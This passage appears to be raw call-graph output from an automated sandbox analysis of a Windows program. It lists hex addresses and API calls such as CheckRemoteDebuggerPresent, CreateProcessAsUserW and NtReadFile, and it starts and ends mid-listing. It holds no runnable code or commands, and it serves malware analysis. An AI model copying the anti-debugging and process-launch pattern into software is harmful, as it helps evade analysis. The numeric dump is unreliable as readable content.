API calls 36133->36134 36136 2e63476 36134->36136 36138 2e63481 36136->36138 36141 2e447ec 11 API calls 36138->36141 36143 2e634ad 36141->36143 36144 2e634b8 36143->36144 36146 2e634c5 36144->36146 36148 2e589d0 20 API calls 36146->36148 36150 2e634d1 36148->36150 36151 2e44860 11 API calls 36150->36151 36152 2e634f2 36151->36152 36154 2e634fd 36152->36154 36157 2e447ec 11 API calls 36154->36157 36158 2e63529 36157->36158 36160 2e63534 36158->36160 36163 2e63541 36160->36163 36165 2e589d0 20 API calls 36163->36165 36167 2e6354d 36165->36167 36168 2e63564 36167->36168 37623 2e47e80 36168->37623 36173 2e63577 36175 2e44860 11 API calls 36173->36175 36174 2e6370d 36176 2e44860 11 API calls 36174->36176 36178 2e63598 36175->36178 36179 2e6372e 36176->36179 36183 2e635a3 36178->36183 36184 2e63739 36179->36184 36186 2e447ec 11 API calls 36183->36186 36187 2e447ec 11 API calls 36184->36187 36188 2e635cf 36186->36188 36189 2e63765 36187->36189 36190 2e635da 36188->36190 36194 2e63770 36189->36194 36192 2e635e7 36190->36192 36196 2e589d0 20 API calls 36192->36196 36197 2e589d0 20 API calls 36194->36197 36198 2e635f3 36196->36198 36199 2e63789 36197->36199 36200 2e44860 11 API calls 36198->36200 36201 2e44860 11 API calls 36199->36201 36203 2e63614 36200->36203 36206 2e637aa 36201->36206 36208 2e6361f 36203->36208 36210 2e447ec 11 API calls 36206->36210 36209 2e447ec 11 API calls 36208->36209 36212 2e6364b 36209->36212 36216 2e637e1 36210->36216 36213 2e63656 36212->36213 36215 2e63663 36213->36215 36219 2e589d0 20 API calls 36215->36219 36220 2e589d0 20 API calls 36216->36220 36221 2e6366f 36219->36221 36222 2e63805 36220->36222 36223 2e44860 11 API calls 36221->36223 36226 2e44a00 11 API calls 36222->36226 36225 2e63690 36223->36225 36232 2e6369b 36225->36232 36228 2e63838 36226->36228 36230 2e44860 11 API calls 36228->36230 36237 2e63859 36230->36237 36233 2e447ec 11 API calls 36232->36233 36235 2e636c7 36233->36235 36238 2e636d2 36235->36238 36240 2e447ec 11 API calls 36237->36240 36242 2e636df 36238->36242 36246 2e63890 36240->36246 36243 2e589d0 20 API calls 36242->36243 36244 2e636eb 36243->36244 36250 2e63702 36244->36250 36249 2e589d0 20 API calls 36246->36249 36252 2e638b4 36249->36252 38081 2e48048 CreateDirectoryA 36250->38081 36254 2e44860 11 API calls 36252->36254 36258 2e638d5 36254->36258 36260 2e638ed 36258->36260 36262 2e447ec 11 API calls 36260->36262 36265 2e6390c 36262->36265 36267 2e63924 36265->36267 36269 2e589d0 20 API calls 36267->36269 36271 2e63930 36269->36271 36272 2e44860 11 API calls 36271->36272 36273 2e63951 36272->36273 36275 2e6395c 36273->36275 36279 2e447ec 11 API calls 36275->36279 36281 2e63988 36279->36281 36283 2e63993 36281->36283 36285 2e589d0 20 API calls 36283->36285 36287 2e639ac 36285->36287 36288 2e44860 11 API calls 36287->36288 36290 2e639cd 36288->36290 36293 2e447ec 11 API calls 36290->36293 36296 2e63a04 36293->36296 36298 2e589d0 20 API calls 36296->36298 36300 2e63a28 36298->36300 36304 2e65530 36300->36304 36305 2e63a3d 36300->36305 36307 2e44860 11 API calls 36304->36307 36306 2e44860 11 API calls 36305->36306 36312 2e63a83 36306->36312 36308 2e65551 36307->36308 36315 2e6555c 36308->36315 36314 2e63a9b 36312->36314 36317 2e47e5c GetFileAttributesA 36314->36317 36318 2e447ec 11 API calls 36315->36318 36320 2e63aa6 36317->36320 36321 2e65588 36318->36321 36320->36304 36322 2e63aae 36320->36322 36324 2e65593 36321->36324 36323 2e44860 11 API calls 36322->36323 36329 2e63acf 36323->36329 36327 2e589d0 20 API calls 36324->36327 36330 2e655ac 36327->36330 36334 2e447ec 11 API calls 36329->36334 36332 2e44860 11 API calls 36330->36332 36338 2e655cd 36332->36338 36339 2e63b06 36334->36339 36341 2e447ec 11 API calls 36338->36341 36343 2e589d0 20 API calls 36339->36343 36346 2e65604 36341->36346 36344 2e63b2a 36343->36344 36345 2e44860 11 API calls 36344->36345 36350 2e63b4b 36345->36350 36348 2e589d0 20 API calls 36346->36348 36351 2e65628 36348->36351 36354 2e447ec 11 API calls 36350->36354 36353 2e44860 11 API calls 36351->36353 36355 2e65649 36353->36355 36361 2e63b82 36354->36361 36356 2e65654 36355->36356 36359 2e65661 36356->36359 36363 2e447ec 11 API calls 36359->36363 36364 2e589d0 20 API calls 36361->36364 36365 2e65680 36363->36365 36367 2e63ba6 36364->36367 36370 2e65698 36365->36370 36368 2e44860 11 API calls 36367->36368 36375 2e63bc7 36368->36375 36372 2e589d0 20 API calls 36370->36372 36373 2e656a4 36372->36373 36376 2e44860 11 API calls 36373->36376 36377 2e447ec 11 API calls 36375->36377 36378 2e656c5 36376->36378 36385 2e63bfe 36377->36385 36380 2e656d0 36378->36380 36383 2e656dd 36380->36383 36387 2e447ec 11 API calls 36383->36387 36388 2e589d0 20 API calls 36385->36388 36389 2e656fc 36387->36389 36391 2e63c22 36388->36391 36394 2e65714 36389->36394 36392 2e44860 11 API calls 36391->36392 36399 2e63c43 36392->36399 36397 2e589d0 20 API calls 36394->36397 36400 2e65720 36397->36400 36403 2e447ec 11 API calls 36399->36403 37632 2e5e398 36400->37632 36411 2e63c7a 36403->36411 36404 2e44530 11 API calls 36406 2e65746 36404->36406 36409 2e44860 11 API calls 36406->36409 36416 2e65767 36409->36416 36414 2e589d0 20 API calls 36411->36414 36421 2e63c9e 36414->36421 36419 2e447ec 11 API calls 36416->36419 36426 2e6579e 36419->36426 38082 2e47990 11 API calls 36421->38082 36425 2e63cd3 36431 2e44860 11 API calls 36425->36431 36427 2e589d0 20 API calls 36426->36427 36429 2e657c2 36427->36429 36432 2e44860 11 API calls 36429->36432 36436 2e63d2a 36431->36436 36438 2e657e3 36432->36438 36439 2e447ec 11 API calls 36436->36439 36441 2e447ec 11 API calls 36438->36441 36444 2e63d61 36439->36444 36445 2e6581a 36441->36445 36446 2e589d0 20 API calls 36444->36446 36449 2e589d0 20 API calls 36445->36449 36448 2e63d85 36446->36448 36451 2e44860 11 API calls 36448->36451 36452 2e6583e 36449->36452 36458 2e63dcb 36451->36458 36453 2e47acc 42 API calls 36452->36453 36455 2e65848 36453->36455 36456 2e5f16c 11 API calls 36455->36456 36459 2e6585a 36456->36459 37627 2e54dd4 36458->37627 36461 2e44530 11 API calls 36459->36461 36462 2e6586a 36461->36462 36463 2e44860 11 API calls 36462->36463 36467 2e6588b 36463->36467 36465 2e63df3 36465->35134 36468 2e447ec 11 API calls 36467->36468 36472 2e658c2 36468->36472 36473 2e589d0 20 API calls 36472->36473 36476 2e658e6 36473->36476 36478 2e44860 11 API calls 36476->36478 36481 2e65907 36478->36481 36483 2e447ec 11 API calls 36481->36483 36487 2e6593e 36483->36487 36488 2e589d0 20 API calls 36487->36488 36490 2e65962 36488->36490 36492 2e44860 11 API calls 36490->36492 36496 2e65983 36492->36496 36499 2e447ec 11 API calls 36496->36499 36501 2e659ba 36499->36501 36504 2e589d0 20 API calls 36501->36504 36506 2e659de 36504->36506 36507 2e44860 11 API calls 36506->36507 36510 2e659ff 36507->36510 36513 2e447ec 11 API calls 36510->36513 36515 2e65a36 36513->36515 36518 2e589d0 20 API calls 36515->36518 36520 2e65a5a 36518->36520 36522 2e5f094 11 API calls 36520->36522 36524 2e65a6a 36522->36524 36525 2e5f108 11 API calls 36524->36525 36526 2e65a7b 36525->36526 36527 2e44530 11 API calls 36526->36527 36528 2e65a8b 36527->36528 36529 2e44860 11 API calls 36528->36529 36530 2e65aac 36529->36530 36531 2e447ec 11 API calls 36530->36531 36532 2e65ae3 36531->36532 36533 2e589d0 20 API calls 36532->36533 36534 2e65b07 36533->36534 36535 2e44860 11 API calls 36534->36535 36536 2e65b28 36535->36536 36537 2e447ec 11 API calls 36536->36537 36538 2e65b5f 36537->36538 36539 2e589d0 20 API calls 36538->36539 36540 2e65b83 36539->36540 36541 2e44860 11 API calls 36540->36541 36542 2e65ba4 36541->36542 36543 2e447ec 11 API calls 36542->36543 36544 2e65bdb 36543->36544 36545 2e589d0 20 API calls 36544->36545 36546 2e65bff 36545->36546 36547 2e44860 11 API calls 36546->36547 36548 2e65c20 36547->36548 36549 2e447ec 11 API calls 36548->36549 36550 2e65c57 36549->36550 36551 2e589d0 20 API calls 36550->36551 36552 2e65c7b 36551->36552 36553 2e44860 11 API calls 36552->36553 36554 2e65c9c 36553->36554 36555 2e447ec 11 API calls 36554->36555 36556 2e65cd3 36555->36556 36557 2e589d0 20 API calls 36556->36557 36558 2e65cf7 36557->36558 36559 2e44860 11 API calls 36558->36559 36560 2e65d18 36559->36560 36561 2e447ec 11 API calls 36560->36561 36562 2e65d4f 36561->36562 36563 2e589d0 20 API calls 36562->36563 36565 2e65d73 36563->36565 36564 2e67568 36566 2e44860 11 API calls 36564->36566 36565->36564 36567 2e44860 11 API calls 36565->36567 36568 2e67589 36566->36568 36569 2e65da8 36567->36569 36571 2e447ec 11 API calls 36568->36571 36570 2e47e5c GetFileAttributesA 36569->36570 36572 2e65dcb 36570->36572 36575 2e675c0 36571->36575 36572->36564 36573 2e65dd3 36572->36573 36574 2e44860 11 API calls 36573->36574 36578 2e65df4 36574->36578 36576 2e589d0 20 API calls 36575->36576 36577 2e675e4 36576->36577 36579 2e44860 11 API calls 36577->36579 36580 2e447ec 11 API calls 36578->36580 36581 2e67605 36579->36581 36582 2e65e2b 36580->36582 36583 2e447ec 11 API calls 36581->36583 36584 2e589d0 20 API calls 36582->36584 36587 2e6763c 36583->36587 36585 2e65e4f 36584->36585 36586 2e44860 11 API calls 36585->36586 36589 2e65e70 36586->36589 36588 2e589d0 20 API calls 36587->36588 36590 2e67660 36588->36590 36592 2e447ec 11 API calls 36589->36592 36591 2e44860 11 API calls 36590->36591 36593 2e67681 36591->36593 36594 2e65ea7 36592->36594 36595 2e447ec 11 API calls 36593->36595 36596 2e589d0 20 API calls 36594->36596 36599 2e676b8 36595->36599 36597 2e65ecb 36596->36597 36598 2e44860 11 API calls 36597->36598 36601 2e65eec 36598->36601 36600 2e589d0 20 API calls 36599->36600 36602 2e676dc 36600->36602 36604 2e447ec 11 API calls 36601->36604 36603 2e44860 11 API calls 36602->36603 36605 2e676fd 36603->36605 36606 2e65f23 36604->36606 36607 2e447ec 11 API calls 36605->36607 36608 2e589d0 20 API calls 36606->36608 36611 2e67734 36607->36611 36609 2e65f47 36608->36609 36610 2e44860 11 API calls 36609->36610 36613 2e65f68 36610->36613 36612 2e589d0 20 API calls 36611->36612 36614 2e67758 36612->36614 36616 2e44860 11 API calls 36613->36616 36615 2e44860 11 API calls 36614->36615 36617 2e67779 36615->36617 36618 2e65fa0 36616->36618 36619 2e447ec 11 API calls 36617->36619 36620 2e447ec 11 API calls 36618->36620 36621 2e677b0 36619->36621 36622 2e65fd7 36620->36622 36623 2e589d0 20 API calls 36621->36623 36624 2e589d0 20 API calls 36622->36624 36625 2e677d4 36623->36625 36626 2e65ffb 36624->36626 36628 2e68318 36625->36628 36629 2e677e9 36625->36629 36627 2e44860 11 API calls 36626->36627 36632 2e6601c 36627->36632 36630 2e44860 11 API calls 36628->36630 36631 2e44860 11 API calls 36629->36631 36635 2e68339 36630->36635 36633 2e6780a 36631->36633 36634 2e447ec 11 API calls 36632->36634 36637 2e447ec 11 API calls 36633->36637 36638 2e66053 36634->36638 36636 2e447ec 11 API calls 36635->36636 36639 2e68370 36636->36639 36640 2e67841 36637->36640 36641 2e589d0 20 API calls 36638->36641 36644 2e589d0 20 API calls 36639->36644 36645 2e589d0 20 API calls 36640->36645 36642 2e66077 36641->36642 36643 2e44860 11 API calls 36642->36643 36650 2e66098 36643->36650 36646 2e68394 36644->36646 36647 2e67865 36645->36647 36648 2e44860 11 API calls 36646->36648 36649 2e44860 11 API calls 36647->36649 36652 2e683b5 36648->36652 36653 2e67886 36649->36653 36651 2e447ec 11 API calls 36650->36651 36656 2e660cf 36651->36656 36655 2e447ec 11 API calls 36652->36655 36654 2e447ec 11 API calls 36653->36654 36658 2e678bd 36654->36658 36657 2e683ec 36655->36657 36659 2e589d0 20 API calls 36656->36659 36661 2e589d0 20 API calls 36657->36661 36662 2e589d0 20 API calls 36658->36662 36660 2e660f3 36659->36660 36663 2e44860 11 API calls 36660->36663 36664 2e68410 36661->36664 36665 2e678e1 36662->36665 36668 2e66114 36663->36668 36666 2e44860 11 API calls 36664->36666 36667 2e44860 11 API calls 36665->36667 36670 2e68431 36666->36670 36671 2e67902 36667->36671 36669 2e447ec 11 API calls 36668->36669 36674 2e6614b 36669->36674 36672 2e447ec 11 API calls 36670->36672 36673 2e447ec 11 API calls 36671->36673 36675 2e68468 36672->36675 36676 2e67939 36673->36676 36677 2e589d0 20 API calls 36674->36677 36679 2e589d0 20 API calls 36675->36679 36680 2e589d0 20 API calls 36676->36680 36678 2e6616f 36677->36678 36681 2e44860 11 API calls 36678->36681 36682 2e6848c 36679->36682 36683 2e6795d 36680->36683 36687 2e661a9 36681->36687 36684 2e44860 11 API calls 36682->36684 36685 2e447ec 11 API calls 36683->36685 36689 2e684ad 36684->36689 36686 2e67975 36685->36686 36690 2e585bc 18 API calls 36686->36690 36688 2e44860 11 API calls 36687->36688 36694 2e661e1 36688->36694 36692 2e447ec 11 API calls 36689->36692 36691 2e67986 36690->36691 36693 2e44860 11 API calls 36691->36693 36697 2e684e4 36692->36697 36695 2e679a7 36693->36695 36696 2e447ec 11 API calls 36694->36696 36699 2e447ec 11 API calls 36695->36699 36701 2e66218 36696->36701 36698 2e589d0 20 API calls 36697->36698 36700 2e68508 36698->36700 36704 2e679de 36699->36704 36702 2e693a1 36700->36702 36703 2e6851d 36700->36703 36705 2e589d0 20 API calls 36701->36705 36706 2e44860 11 API calls 36702->36706 36707 2e44860 11 API calls 36703->36707 36711 2e589d0 20 API calls 36704->36711 36708 2e6623c 36705->36708 36714 2e693c2 36706->36714 36710 2e6853e 36707->36710 36709 2e44860 11 API calls 36708->36709 36716 2e6625d 36709->36716 36715 2e68556 36710->36715 36712 2e67a02 36711->36712 36713 2e44860 11 API calls 36712->36713 36721 2e67a23 36713->36721 36717 2e447ec 11 API calls 36714->36717 36718 2e447ec 11 API calls 36715->36718 36719 2e447ec 11 API calls 36716->36719 36723 2e693f9 36717->36723 36720 2e68575 36718->36720 36725 2e66294 36719->36725 36724 2e6858d 36720->36724 36722 2e447ec 11 API calls 36721->36722 36729 2e67a5a 36722->36729 36727 2e589d0 20 API calls 36723->36727 36726 2e589d0 20 API calls 36724->36726 36730 2e589d0 20 API calls 36725->36730 36728 2e68599 36726->36728 36731 2e6941d 36727->36731 36732 2e44860 11 API calls 36728->36732 36736 2e589d0 20 API calls 36729->36736 36733 2e662b8 36730->36733 36734 2e44860 11 API calls 36731->36734 36735 2e685ba 36732->36735 36737 2e44860 11 API calls 36733->36737 36740 2e6943e 36734->36740 36742 2e685c5 36735->36742 36738 2e67a7e 36736->36738 36741 2e662d9 36737->36741 36739 2e44860 11 API calls 36738->36739 36747 2e67a9f 36739->36747 36743 2e447ec 11 API calls 36740->36743 36745 2e447ec 11 API calls 36741->36745 36744 2e447ec 11 API calls 36742->36744 36749 2e69475 36743->36749 36746 2e685f1 36744->36746 36750 2e66310 36745->36750 36751 2e685fc 36746->36751 36748 2e447ec 11 API calls 36747->36748 36755 2e67ad6 36748->36755 36752 2e589d0 20 API calls 36749->36752 36756 2e589d0 20 API calls 36750->36756 36753 2e589d0 20 API calls 36751->36753 36757 2e69499 36752->36757 36754 2e68615 36753->36754 36758 2e44860 11 API calls 36754->36758 36761 2e589d0 20 API calls 36755->36761 36759 2e66334 36756->36759 36760 2e44860 11 API calls 36757->36760 36764 2e68636 36758->36764 36762 2e44860 11 API calls 36759->36762 36763 2e694ba 36760->36763 36766 2e67afa 36761->36766 36765 2e66355 36762->36765 36767 2e447ec 11 API calls 36763->36767 36768 2e447ec 11 API calls 36764->36768 36769 2e447ec 11 API calls 36765->36769 38085 2e5adf8 29 API calls 36766->38085 36773 2e694f1 36767->36773 36774 2e6866d 36768->36774 36775 2e6638c 36769->36775 36771 2e67b21 36772 2e44860 11 API calls 36771->36772 36778 2e67b42 36772->36778 36776 2e589d0 20 API calls 36773->36776 36777 2e589d0 20 API calls 36774->36777 36779 2e589d0 20 API calls 36775->36779 36789 2e69515 36776->36789 36780 2e68691 36777->36780 36784 2e447ec 11 API calls 36778->36784 36781 2e663b0 36779->36781 36782 2e447ec 11 API calls 36780->36782 36785 2e44860 11 API calls 36781->36785 36783 2e686bd 36782->36783 36788 2e686d5 36783->36788 36790 2e67b79 36784->36790 36791 2e663d1 36785->36791 36786 2e69cf5 36787 2e44860 11 API calls 36786->36787 36794 2e69d16 36787->36794 36795 2e686e0 CreateProcessAsUserW 36788->36795 36789->36786 36792 2e44860 11 API calls 36789->36792 36796 2e589d0 20 API calls 36790->36796 36793 2e447ec 11 API calls 36791->36793 36804 2e69560 36792->36804 36806 2e66408 36793->36806 36800 2e447ec 11 API calls 36794->36800 36797 2e686f2 36795->36797 36798 2e6876e 36795->36798 36799 2e67b9d 36796->36799 36802 2e44860 11 API calls 36797->36802 36801 2e44860 11 API calls 36798->36801 36803 2e44860 11 API calls 36799->36803 36810 2e69d4d 36800->36810 36811 2e6878f 36801->36811 36805 2e68713 36802->36805 36812 2e67bbe 36803->36812 36807 2e447ec 11 API calls 36804->36807 36808 2e6871e 36805->36808 36809 2e589d0 20 API calls 36806->36809 36819 2e69597 36807->36819 36818 2e447ec 11 API calls 36808->36818 36813 2e6642c 36809->36813 36816 2e589d0 20 API calls 36810->36816 36817 2e447ec 11 API calls 36811->36817 36814 2e447ec 11 API calls 36812->36814 36815 2e44860 11 API calls 36813->36815 36826 2e67bf5 36814->36826 36827 2e6644d 36815->36827 36820 2e69d71 36816->36820 36825 2e687c6 36817->36825 36821 2e6874a 36818->36821 36824 2e589d0 20 API calls 36819->36824 36822 2e44860 11 API calls 36820->36822 36823 2e68755 36821->36823 36830 2e69d92 36822->36830 36832 2e589d0 20 API calls 36823->36832 36828 2e695bb 36824->36828 36831 2e589d0 20 API calls 36825->36831 36833 2e589d0 20 API calls 36826->36833 36834 2e447ec 11 API calls 36827->36834 36829 2e44860 11 API calls 36828->36829 36840 2e695dc 36829->36840 36837 2e447ec 11 API calls 36830->36837 36835 2e687ea 36831->36835 36832->36798 36836 2e67c19 36833->36836 36841 2e66484 36834->36841 36838 2e44860 11 API calls 36835->36838 36839 2e44860 11 API calls 36836->36839 36844 2e69dc9 36837->36844 36845 2e6880b 36838->36845 36846 2e67c3a 36839->36846 36842 2e447ec 11 API calls 36840->36842 36843 2e589d0 20 API calls 36841->36843 36853 2e69613 36842->36853 36847 2e664a8 36843->36847 36849 2e589d0 20 API calls 36844->36849 36850 2e447ec 11 API calls 36845->36850 36851 2e447ec 11 API calls 36846->36851 36848 2e44860 11 API calls 36847->36848 36852 2e664d5 36848->36852 36854 2e69ded 36849->36854 36860 2e68842 36850->36860 36857 2e67c71 36851->36857 37645 2e585bc 36852->37645 36856 2e589d0 20 API calls 36853->36856 36855 2e44860 11 API calls 36854->36855 36863 2e69e0e 36855->36863 36859 2e69637 36856->36859 36865 2e589d0 20 API calls 36857->36865 36862 2e44860 11 API calls 36859->36862 36870 2e69658 36862->36870 36869 2e447ec 11 API calls 36863->36869 36868 2e67c95 36865->36868 36874 2e44860 11 API calls 36868->36874 36877 2e69e45 36869->36877 36875 2e447ec 11 API calls 36870->36875 36881 2e67cd5 36874->36881 36882 2e6968f 36875->36882 36879 2e589d0 20 API calls 36877->36879 36888 2e69e69 36879->36888 36884 2e447ec 11 API calls 36881->36884 36885 2e589d0 20 API calls 36882->36885 36887 2e696b3 36885->36887 36891 2e5f094 11 API calls 36887->36891 37557 2e42eed 37556->37557 37558 2e42ef8 GetTickCount 37556->37558 37557->35141 37558->35141 37560 2e5f711 37559->37560 37561 2e5f6fa GetProcAddress 37559->37561 37560->35213 37562 2e5f709 37561->37562 37562->35213 37564 2e5f760 GetProcAddress 37563->37564 37565 2e5f786 37563->37565 37564->37565 37566 2e5f774 CheckRemoteDebuggerPresent 37564->37566 37565->35215 37565->35218 37566->37565 37568 2e449a4 37567->37568 37568->35237 37576 2e5e114 37569->37576 37570 2e5e197 37571 2e444dc 11 API calls 37570->37571 37572 2e5e19f 37571->37572 37574 2e44530 11 API calls 37572->37574 37573 2e449f8 11 API calls 37573->37576 37575 2e5e1aa 37574->37575 37577 2e44500 11 API calls 37575->37577 37576->37570 37576->37573 37578 2e5e1c4 37577->37578 37578->35356 37580 2e449a0 37579->37580 37581 2e47e66 GetFileAttributesA 37580->37581 37582 2e47e71 37581->37582 37582->35378 37582->35379 37584 2e445cc 11 API calls 37583->37584 37585 2e4c38b 37584->37585 37585->35437 37587 2e44de6 37586->37587 37589 2e47adc 37588->37589 37590 2e47afd 37589->37590 38091 2e47660 42 API calls 37589->38091 37592 2e5f16c 37590->37592 37593 2e5f189 37592->37593 37594 2e5f1e7 37593->37594 38092 2e446c4 11 API calls 37593->38092 38093 2e44530 11 API calls 37593->38093 37595 2e444dc 11 API calls 37594->37595 37597 2e5f1fc 37595->37597 37598 2e444dc 11 API calls 37597->37598 37600 2e5f204 37598->37600 37600->35920 37602 2e44530 11 API calls 37601->37602 37605 2e5f11c 37602->37605 37603 2e5f163 37603->35967 37604 2e449f8 11 API calls 37604->37605 37605->37603 37605->37604 37607 2e5e265 37606->37607 37608 2e44530 11 API calls 37607->37608 37609 2e5e291 37608->37609 38094 2e457d0 37609->38094 37611 2e5e2d1 37612 2e44530 11 API calls 37611->37612 37614 2e5e2e3 37612->37614 37613 2e44a00 11 API calls 37615 2e5e2b5 37613->37615 37617 2e44500 11 API calls 37614->37617 37615->37611 37615->37613 37615->37614 38097 2e44a40 11 API calls 37615->38097 37618 2e5e348 37617->37618 37619 2e45818 37618->37619 37620 2e4581f 37619->37620 37621 2e45839 37620->37621 38120 2e457dc 13 API calls 37620->38120 37621->36033 37624 2e449a0 37623->37624 37625 2e47e8a GetFileAttributesA 37624->37625 37626 2e47e95 37625->37626 37626->36173 37626->36174 38121 2e55be8 37627->38121 37629 2e54dee 38125 2e47de0 WriteFile 37629->38125 37630 2e54e09 37630->36465 37634 2e5e3ba 37632->37634 37633 2e5e45c 37635 2e44bcc 11 API calls 37633->37635 37634->37633 38158 2e446c4 11 API calls 37634->38158 38159 2e44530 11 API calls 37634->38159 37636 2e5e471 37635->37636 37637 2e44530 11 API calls 37636->37637 37639 2e5e47c 37637->37639 37641 2e444dc 11 API calls 37639->37641 37642 2e5e491 37641->37642 37643 2e44500 11 API calls 37642->37643 37644 2e5e49e 37643->37644 37644->36404 37646 2e44530 11 API calls 37645->37646 37647 2e585df 37646->37647 37648 2e44860 11 API calls 37647->37648 37649 2e585fe 37648->37649 37650 2e581cc 17 API calls 37649->37650 38059 2e44f20 SysAllocStringLen 38058->38059 38060 2e5dd85 38059->38060 38061 2e444dc 11 API calls 38060->38061 38062 2e5dd9a 38061->38062 38063 2e5ddaa RtlDosPathNameToNtPathName_U 38062->38063 38205 2e5dbdc 38063->38205 38065 2e5ddc6 NtOpenFile NtQueryInformationFile 38066 2e44bcc 11 API calls 38065->38066 38067 2e5de01 38066->38067 38068 2e449f8 11 API calls 38067->38068 38069 2e5de0d NtReadFile NtClose 38068->38069 38070 2e5de37 38069->38070 38071 2e44c60 SysFreeString 38070->38071 38072 2e5de3f 38071->38072 38072->35578 38074 2e5e1e6 38073->38074 38206 2e48d94 38074->38206 38077 2e444dc 11 API calls 38078 2e5e239 38077->38078 38078->35694 38078->35695 38080 2e44d7a 38079->38080 38081->36174 38082->36425 38085->36771 38091->37590 38092->37593 38093->37593 38098 2e45644 38094->38098 38097->37615 38099 2e45663 38098->38099 38104 2e4567d 38098->38104 38100 2e4566e 38099->38100 38115 2e42cf4 11 API calls 38099->38115 38116 2e4563c 13 API calls 38100->38116 38103 2e45678 38103->37615 38105 2e456c6 38104->38105 38117 2e42cf4 11 API calls 38104->38117 38107 2e456d3 38105->38107 38108 2e45708 38105->38108 38118 2e42c44 11 API calls 38107->38118 38110 2e42c10 11 API calls 38108->38110 38111 2e45712 38110->38111 38112 2e45703 38111->38112 38119 2e45624 16 API calls 38111->38119 38112->38103 38114 2e45644 16 API calls 38112->38114 38114->38112 38115->38100 38116->38103 38117->38105 38118->38112 38119->38112 38120->37621 38122 2e55bf1 38121->38122 38127 2e55c2c 38122->38127 38124 2e55c0d 38124->37629 38126 2e47dfd 38125->38126 38126->37630 38128 2e55c47 38127->38128 38129 2e55cec 38128->38129 38130 2e55c6e 38128->38130 38154 2e47d5c CreateFileA 38129->38154 38132 2e55c87 CreateFileA 38130->38132 38133 2e55c98 38132->38133 38135 2e55ce5 38133->38135 38151 2e47f98 12 API calls 38133->38151 38134 2e55cf6 38134->38135 38155 2e47f98 12 API calls 38134->38155 38136 2e44530 11 API calls 38135->38136 38139 2e55d59 38136->38139 38144 2e44500 11 API calls 38139->38144 38140 2e55d11 GetLastError 38156 2e4a778 12 API calls 38140->38156 38141 2e55cac GetLastError 38152 2e4a778 12 API calls 38141->38152 38147 2e55d73 38144->38147 38145 2e55d28 38157 2e4b084 42 API calls 38145->38157 38146 2e55cc3 38153 2e4b084 42 API calls 38146->38153 38147->38124 38150 2e55d4a 38150->38135 38151->38141 38152->38146 38153->38135 38154->38134 38155->38140 38156->38145 38157->38150 38158->37634 38159->37634 38205->38065 38207 2e48da1 38206->38207 38208 2e48dc7 38207->38208 38210 2e47660 42 API calls 38207->38210 38208->38077 38210->38208 38211 2e44edc 38212 2e44ee9 38211->38212 38216 2e44ef0 38211->38216 38217 2e44c38 38212->38217 38223 2e44c50 38216->38223 38218 2e44c4c 38217->38218 38219 2e44c3c SysAllocStringLen 38217->38219 38218->38216 38219->38218 38220 2e44c30 38219->38220 38221 2e44f26 SysAllocStringLen 38220->38221 38222 2e44f3c 38220->38222 38221->38220 38221->38222 38222->38216 38224 2e44c56 SysFreeString 38223->38224 38225 2e44c5c 38223->38225 38224->38225 38226 2e41c6c 38227 2e41d04 38226->38227 38228 2e41c7c 38226->38228 38229 2e41d0d 38227->38229 38230 2e41f58 38227->38230 38231 2e41cc0 38228->38231 38232 2e41c89 38228->38232 38233 2e41e24 38229->38233 38234 2e41d25 38229->38234 38237 2e41fec 38230->38237 38240 2e41fac 38230->38240 38241 2e41f68 38230->38241 38235 2e41724 10 API calls 38231->38235 38236 2e41c94 38232->38236 38274 2e41724 38232->38274 38252 2e41e55 Sleep 38233->38252 38253 2e41e7c 38233->38253 38254 2e41e95 38233->38254 38238 2e41d2c 38234->38238 38245 2e41dfc 38234->38245 38246 2e41d48 38234->38246 38247 2e41cd7 38235->38247 38244 2e41fb2 38240->38244 38248 2e41724 10 API calls 38240->38248 38242 2e41724 10 API calls 38241->38242 38266 2e41f82 38242->38266 38243 2e41724 10 API calls 38264 2e41f2c 38243->38264 38250 2e41724 10 API calls 38245->38250 38255 2e41d79 Sleep 38246->38255 38262 2e41d9c 38246->38262 38260 2e41a8c 8 API calls 38247->38260 38265 2e41cfd 38247->38265 38261 2e41fc1 38248->38261 38249 2e41ca1 38263 2e41cb9 38249->38263 38298 2e41a8c 38249->38298 38268 2e41e05 38250->38268 38251 2e41fa7 38252->38253 38256 2e41e6f Sleep 38252->38256 38253->38243 38253->38254 38257 2e41d91 Sleep 38255->38257 38255->38262 38256->38233 38257->38246 38259 2e41e1d 38260->38265 38261->38251 38270 2e41a8c 8 API calls 38261->38270 38264->38254 38267 2e41a8c 8 API calls 38264->38267 38266->38251 38269 2e41a8c 8 API calls 38266->38269 38271 2e41f50 38267->38271 38268->38259 38272 2e41a8c 8 API calls 38268->38272 38269->38251 38273 2e41fe4 38270->38273 38272->38259 38275 2e41968 38274->38275 38286 2e4173c 38274->38286 38276 2e41a80 38275->38276 38277 2e41938 38275->38277 38278 2e41684 VirtualAlloc 38276->38278 38279 2e41a89 38276->38279 38280 2e41947 Sleep 38277->38280 38285 2e41986 38277->38285 38281 2e416bf 38278->38281 38282 2e416af 38278->38282 38279->38249 38280->38285 38287 2e4195d Sleep 38280->38287 38281->38249 38315 2e41644 38282->38315 38283 2e4174e 38284 2e4175d 38283->38284 38290 2e4182c 38283->38290 38291 2e4180a Sleep 38283->38291 38284->38249 38293 2e415cc VirtualAlloc 38285->38293 38295 2e419a4 38285->38295 38286->38283 38289 2e417cb Sleep 38286->38289 38287->38277 38289->38283 38292 2e417e4 Sleep 38289->38292 38297 2e41838 38290->38297 38321 2e415cc 38290->38321 38291->38290 38294 2e41820 Sleep 38291->38294 38292->38286 38293->38295 38294->38283 38295->38249 38297->38249 38299 2e41aa1 38298->38299 38300 2e41b6c 38298->38300 38302 2e41aa7 38299->38302 38304 2e41b13 Sleep 38299->38304 38301 2e416e8 38300->38301 38300->38302 38303 2e41c66 38301->38303 38308 2e41644 2 API calls 38301->38308 38305 2e41ab0 38302->38305 38307 2e41b4b Sleep 38302->38307 38312 2e41b81 38302->38312 38303->38263 38304->38302 38306 2e41b2d Sleep 38304->38306 38305->38263 38306->38299 38309 2e41b61 Sleep 38307->38309 38307->38312 38310 2e416f5 VirtualFree 38308->38310 38309->38302 38311 2e4170d 38310->38311 38311->38263 38313 2e41c00 VirtualFree 38312->38313 38314 2e41ba4 38312->38314 38313->38263 38314->38263 38316 2e41681 38315->38316 38317 2e4164d 38315->38317 38316->38281 38317->38316 38318 2e4164f Sleep 38317->38318 38319 2e41664 38318->38319 38319->38316 38320 2e41668 Sleep 38319->38320 38320->38317 38325 2e41560 38321->38325 38323 2e415d4 VirtualAlloc 38324 2e415eb 38323->38324 38324->38297 38326 2e41500 38325->38326 38326->38323 38327 